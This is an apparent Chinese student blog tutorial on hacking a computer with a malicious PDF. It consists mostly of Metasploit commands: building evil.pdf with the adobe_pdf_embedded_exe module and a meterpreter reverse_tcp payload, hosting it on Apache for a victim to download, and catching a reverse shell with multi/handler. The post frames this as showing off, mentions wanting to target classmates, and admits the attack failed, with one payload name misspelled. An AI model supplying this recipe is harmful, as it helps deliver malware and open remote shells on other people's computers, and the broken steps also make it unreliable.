使用PDF文件入侵任何操作系统

提示:我们8月28号开学,所以我得快点更新了,不能拖了😥

文章目录


前言

PDF文件被广泛应用于共享信息,电子邮件,网站或文档或存储系统的真实链接

它可以用于恶意软件的载体。

不要问我什么意思?我的意思是PDF文件可以入侵你的电脑,是的,这很简单

学会这个您可以向您的家人,朋友,炫耀 (我是大黑阔,我好厉害呀)

当然,前提是不要用于违法活动,如果您进行了,您会在几分钟之内,进监狱,然后看不了我的文章了不能向家人炫耀了。

我不唠叨了,让我们开始吧

(这前言写的真好)


提示:以下是本篇文章非正文内容,下面案例请勿进行违法活动

一、打开终端

输入

bash 复制代码
msfconsole

然后输入这个:

bash 复制代码
use exploit/windows/fileformat/adobe_pdf_embedded_exe

我们得配置,输入

bash 复制代码
show options

输入:

bash 复制代码
set payload windows/x64/meterpreter/erverse_tcp

这将是他们所使用的ip

输入

bash 复制代码
show options

这是恶意PDF文件名,看完了吗?看完了我们继续

输入:

bash 复制代码
exploit

文件创建在哪里了?看这里。

是不是很麻烦,又要开权限,拿文件我们使用mv,输入

bash 复制代码
mv /root/.msf4/local/evil.pdf /var/www/html/evil.pdf

然后让我们打开apache服务,输入:

bash 复制代码
systemctl start apache2.service

让我再炫耀一次,输入这个

bash 复制代码
systemctl status apache2.service

这个是用来检查apache服务状态,然后就没了,这基本上是开了网络服务器。

这是Windows11,作为目标,当然,这是我的电脑,我很想用同学的电脑,当目标,他们害怕我,所以就用我的

打开浏览器输入您的IP/文件名

您会发现,啊,直接打开了,对的,您需要邮件,然后保存到桌面就行了

回到攻击机,输入:

bash 复制代码
use exploit/multi/handler
bash 复制代码
set payload windows/x64/meterpreter/reverse_tcp

坚持住,我们还差一个

bash 复制代码
set LHOST 192.168.0.140

然后输入

bash 复制代码
exploit

好吧,又出事故了,我打开文件了,却连接不了

我检查了很多遍,这跟我笔记上写的对啊?


总结

翻车了

相关推荐
开开心心就好5 小时前
免费PDF处理软件,支持多种操作
运维·服务器·前端·spring boot·智能手机·pdf·电脑
念九_ysl9 小时前
Java 使用 OpenHTMLToPDF + Batik 将含 SVG 遮罩的 HTML 转为 PDF 的完整实践
java·开发语言·pdf
一头生产的驴18 小时前
java整合itext pdf实现自定义PDF文件格式导出
java·spring boot·pdf·itextpdf
开开心心就好2 天前
批量PDF转换工具,一键转换Word Excel
开发语言·前端·学习·pdf·电脑·word·excel
老家的回忆2 天前
jsPDF和html2canvas生成pdf,组件用的elementplus,亲测30多页,20s实现
前端·vue.js·pdf·html2canvas·jspdf
Vertira2 天前
pdf 合并 python实现(已解决)
前端·python·pdf
十一0829932 天前
【PDF-XSS攻击】springboot项目-上传文件-解决PDF文件XSS攻击
spring boot·pdf·xss
qq_393828222 天前
PDF的图片文字识别工具
windows·pdf·电脑·软件需求·图片处理
wsxqaz3 天前
浏览器原生控件上传PDF导致hash值不同
算法·pdf·哈希算法
工业3D_大熊12 天前
3D模式格式转换工具HOOPS Exchange如何将3D PDF转换为STEP格式?
3d·pdf·3d格式转换·3d模型格式转换·cad格式转换·cad数据格式转换·3d模型可视化